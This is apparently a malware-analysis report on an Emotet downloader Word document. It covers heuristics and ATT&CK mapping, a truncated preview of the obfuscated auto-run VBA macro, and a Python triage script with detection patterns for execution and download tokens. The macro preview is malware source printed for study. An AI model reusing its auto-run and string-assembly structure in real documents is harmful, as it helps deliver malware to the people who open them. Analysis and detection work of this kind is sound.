Verdict: MALICIOUS
Risk Score: 202
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1105 Ingress Tool Transfer
The sample contains a VBA macro that runs automatically when the document is opened with macros enabled: both the Document_Open handler and the GetObject call heuristics fire. ClamAV identifies the file as Emotet (Doc.Downloader.Emotet-7543223-0), a known downloader. The extracted source is obfuscated in the style typical of Emotet maldocs: the functional statements are buried in nested Do While loops whose conditions compare never-assigned variables to constants (an unassigned VBA variable is Empty, so the conditions are false and the loop bodies never execute), and the operative string is assembled from properties of a form module (Xhskqoai) and a control's .Tag, then cleaned by Split on the junk delimiter "9_msnnj883hn///" followed by Join with an empty string. The code that issues the GetObject call falls outside the preview below, but the heuristics confirm it is present, so the macro most likely stages the download and execution of a secondary payload, consistent with Emotet's behaviour.
Heuristics (6)
- ClamAV: Doc.Downloader.Emotet-7543223-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-7543223-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Document_Open macro (high, OLE_VBA_DOCOPEN): the document defines a Document_Open handler, so the macro runs as soon as the document is opened with macros enabled
- GetObject call (high, OLE_VBA_GETOBJ): the macro calls GetObject, a common way to obtain a COM object through which a process is launched
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the OOXML DrawingML namespace URI, a benign schema identifier embedded in any document carrying drawing markup, not a download location.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11371 bytes | 4b89f6cf6e92d499756108fe403b382041891ca8830bd483d3b0b932102cd3e1 |

Preview (first 1,000 lines of the extracted script, shown exactly as extracted):
Attribute VB_Name = "Zjnihuyd"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
Rnmzapoebrzf
End Sub
Attribute VB_Name = "Xhskqoai"
Attribute VB_Base = "0{4C1114CC-CCAD-4819-8BDA-F0B0B3E20163}{95DA1639-C0C5-42E9-B6A6-1BE9A9550CD8}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Bzhdksxaqsqec"
Function Ojjuqsjefq()
Do While Tllmtfcvwo = 900
Do While Bafpxose = 3 + 2
Urfajnnpofs = Chr(4)
Ecyjrownsybeb = Sqr(9) + Xgubgfqthswph
Jkfabmyfbpiab = CLng(Vhwrsilq)
Njrquzpgsoqz = Int(1 + 1)
Jyatmyeoadw = CDate(QKoWc)
Qoqytpgndhog = 9 + Int(4)
Loop
Do While Tjemwghhuire = 2 + 4
Yinufgyscqx = CLng(Bfrmmvfkfwrz)
Iuigpypovt = Int(1 + 4)
Kubgnpml = 2 + Int(3)
Cvejmftl = Chr(6)
Xuqytjilemkx = Sqr(7) + Lkjzibnwfh
Bglkvjwzcp = CDate(QKoWc)
Loop
Loop
Abfwawjb = ChrW(wdKeyP)
Do While Lbsvxxuqgpvy = 900
Do While Tlmghpldka = 3 + 2
Bfpztgcxpzczi = Chr(4)
Kgmufkyijc = Sqr(9) + Kiiqsmzwoahv
Cuuimxiebwygd = CLng(Wfwsospg)
Mjcwjzrfih = Int(1 + 1)
Aqdjfhmsljk = CDate(QKoWc)
Vlcaennkyzof = 9 + Int(4)
Loop
Do While Xgbuhyhefoem = 2 + 4
Qzdyjeonofet = CLng(Cqpdxpom)
Dukqfovrgtu = Int(1 + 4)
Pwddjrwqnhdbp = 2 + Int(3)
Prfepovo = Chr(6)
Iajnnxjdtzhtm = Sqr(7) + Nyqngoppubon
Iuijfaqmcz = CDate(QKoWc)
Loop
Loop
Cmyxktysd = Abfwawjb + Xhskqoai.Jvhvaxaeqcz + Xhskqoai.Bhahpqcrjgca
Do While Snkvydgpdkm = 900
Do While Hrlobhzajueh = 3 + 2
Hkcprsfban = Chr(4)
Xmzurfrbh = Sqr(9) + Jkespitfn
Yeauvpofqxmu = CLng(Apczqibqft)
Zqthhoscou = Int(1 + 1)
Kbmbahwpugosq = CDate(QKoWc)
Fshzgpipyljpy = 9 + Int(4)
Loop
Do While Ygvfoovzq = 2 + 4
Pstcaqaqmjgvn = CLng(Moqqsynn)
Xksjktqbj = Int(1 + 4)
Wwltohpxrki = 2 + Int(3)
Chjafycelt = Chr(6)
Ihcqqtdhm = Sqr(7) + Fwdqxpqxomfg
Pwlxklchng = CDate(QKoWc)
Loop
Loop
Fack = Xhskqoai.Bdocprwabpp.Tag
Wcsoqfpvhikng = Split(Cmyxktysd + LTrim(LTrim(Fack)), "9_msnnj883hn///")
Do While Glbodoqfmkfot = 900
Do While Holymhlqyqomz = 3 + 2
Povgubymqw = Chr(4)
Wnbhlbvzqffm = Sqr(9) + Udxpcrrzuqsn
Jbucuoocwjcke = CLng(Kiiqzgvobuzbw)
Oygxqokdra = Int(1 + 1)
Homrncckhkww = CDate(QKoWc)
Msivnrjkuee = 9 + Int(4)
Loop
Do While Izfqpsnnapcly = 2 + 4
Ddckhccrv = CLng(Ojwuinhdukc)
Dcamdfjox = Int(1 + 4)
Qbuywgikt = 2 + Int(3)
Erfgoevz = Chr(6)
Kvhebpnp = Sqr(7) + Rhpdgtigocrze
Jgwretydgggnt = CDate(QKoWc)
Loop
Loop
Ojjuqsjefq = Vddmpvdcpsif + Join(Wcsoqfpvhikng, "") + Vddmpvdcpsif
Do While Zafwmamb = 900
Do While Qezucrioy = 3 + 2
Bbaujfxjg = Chr(4)
Ivywpwgf = Sqr(9) + Euwinwoexwg
Xyebduosvqnw = CLng(Gcmhtitwhemvi)
Ivwkabxlu = Int(1 + 1)
Zvjejmjahc = CDate(QKoWc)
Npaaraphlfn = 9 + Int(4)
Loop
Do While Qlduirreijxn = 2 + 4
Zmibbwgjuzag = CLng(Vythwjtaf)
Ltjegcmofqvdd = Int(1 + 4)
Ngqdtbgnjjp = 2 + Int(3)
Sbygbbqdweox = Chr(6)
... (truncated)
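As an added example (not code from this page's analyzer or from oletools), the following Python script performs the triage steps a practitioner would take on a macro like the one previewed above: flag the auto-exec entry point and the execution primitive, recover the Split/Join junk delimiter, and strip the dead Do While padding so the operative lines become readable. The VBA excerpt embedded in it is constructed: it copies the Document_open stub, a pair of nested padding loops and the Split/Join lines from the preview, while the GetObject line is a stand-in and is not recovered from the sample. Function names such as triage and strip_dead_loops are this example's own.

```python
import re

# Constructed VBA excerpt for this example. The Document_open stub, the nested
# Do While padding and the Split/Join lines mirror lines visible in the macro
# extracted on this page; the GetObject line is a constructed stand-in, not
# recovered from the sample (the real operative string lives in form-control
# properties that the preview does not include).
SAMPLE_VBA = '''Private Sub Document_open()
Rnmzapoebrzf
End Sub
Function Ojjuqsjefq()
Do While Tllmtfcvwo = 900
Do While Bafpxose = 3 + 2
Urfajnnpofs = Chr(4)
Loop
Loop
Wcsoqfpvhikng = Split(Cmyxktysd + LTrim(LTrim(Fack)), "9_msnnj883hn///")
Ojjuqsjefq = Vddmpvdcpsif + Join(Wcsoqfpvhikng, "") + Vddmpvdcpsif
End Function
Sub Rnmzapoebrzf()
Set Obj = GetObject(Ojjuqsjefq())
End Sub
'''

# Procedure names Office runs without user interaction (Word and Excel).
AUTOEXEC_NAMES = (r'Document_Open|Document_Close|AutoOpen|Auto_Open|'
                  r'AutoClose|AutoExec|Workbook_Open')
AUTOEXEC = re.compile(
    r'^\s*(?:Private\s+|Public\s+)?(?:Sub|Function)\s+(' + AUTOEXEC_NAMES + r')\b',
    re.IGNORECASE | re.MULTILINE)

# Tokens that give a macro a way to run or fetch something.
SUSPICIOUS = re.compile(
    r'\b(GetObject|CreateObject|Shell|WScript\.Shell|winmgmts|Win32_Process|'
    r'URLDownloadToFile|XMLHTTP|ADODB\.Stream|powershell)\b',
    re.IGNORECASE)

# Split(<expr>, "<literal>"): the literal is the junk delimiter inserted into
# the real string, which Join(parts, "") later removes.
SPLIT_DELIM = re.compile(r'\bSplit\s*\(.*?,\s*"([^"]+)"\s*\)', re.IGNORECASE)

DO_WHILE = re.compile(r'^\s*Do\s+While\s+(\w+)\s*=', re.IGNORECASE)
LOOP_END = re.compile(r'^\s*Loop\b', re.IGNORECASE)


def find_autoexec(src):
    return [m.group(1) for m in AUTOEXEC.finditer(src)]


def find_suspicious(src):
    return sorted(set(m.group(1) for m in SUSPICIOUS.finditer(src)))


def find_split_delimiters(src):
    return SPLIT_DELIM.findall(src)


def split_join(blob, delimiter):
    """Replicates VBA Split(blob, delimiter) followed by Join(parts, "")."""
    return "".join(blob.split(delimiter))


def strip_dead_loops(src):
    """Drop 'Do While X = <const>' blocks whose control variable X is never
    assigned anywhere in the module. An undeclared, never-assigned VBA variable
    is Empty, which compares as 0, so the condition is false on entry and the
    whole block (nested loops included) is dead padding. Only the '=' form is
    handled; other comparisons are left in place."""
    assigned = set(re.findall(r'^\s*(\w+)\s*=', src, re.MULTILINE))
    out, depth = [], 0
    for line in src.splitlines():
        if depth:                       # inside a dead block: track nesting
            if DO_WHILE.match(line):
                depth += 1
            elif LOOP_END.match(line):
                depth -= 1
            continue
        m = DO_WHILE.match(line)
        if m and m.group(1) not in assigned:
            depth = 1                   # open a dead block, drop its header
            continue
        out.append(line)
    return "\n".join(out)


def triage(src):
    """Summarise the macro: entry points, execution tokens, junk delimiters
    and how much of the source is dead-loop padding."""
    cleaned = strip_dead_loops(src)
    total = len(src.splitlines())
    return {
        "autoexec": find_autoexec(src),
        "suspicious": find_suspicious(src),
        "split_delimiters": find_split_delimiters(src),
        "dead_code_ratio": round(1 - len(cleaned.splitlines()) / total, 2),
        "cleaned": cleaned,
    }


if __name__ == "__main__":
    report = triage(SAMPLE_VBA)
    for key in ("autoexec", "suspicious", "split_delimiters", "dead_code_ratio"):
        print(f"{key}: {report[key]}")
    print(report["cleaned"])
```

The delimiter and dead-loop checks are static and deliberately conservative: a loop is dropped only when its control variable is assigned nowhere in the module, and the recovered delimiter is only useful once the fragments that live in the form-control properties have been pulled out of the document (olevba's form-data extraction or an emulator such as ViperMonkey). Run on the full macros.bas from this sample, the dead-code ratio is what explains why a 11371-byte module exposes only a handful of operative statements.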